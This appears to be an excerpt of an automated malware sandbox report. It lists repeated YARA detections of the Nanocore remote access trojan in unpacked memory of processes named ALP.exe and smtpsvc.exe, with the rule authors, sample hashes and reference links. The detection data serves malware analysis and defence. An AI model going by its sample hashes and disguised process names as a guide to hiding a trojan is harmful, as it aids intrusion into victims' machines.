        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
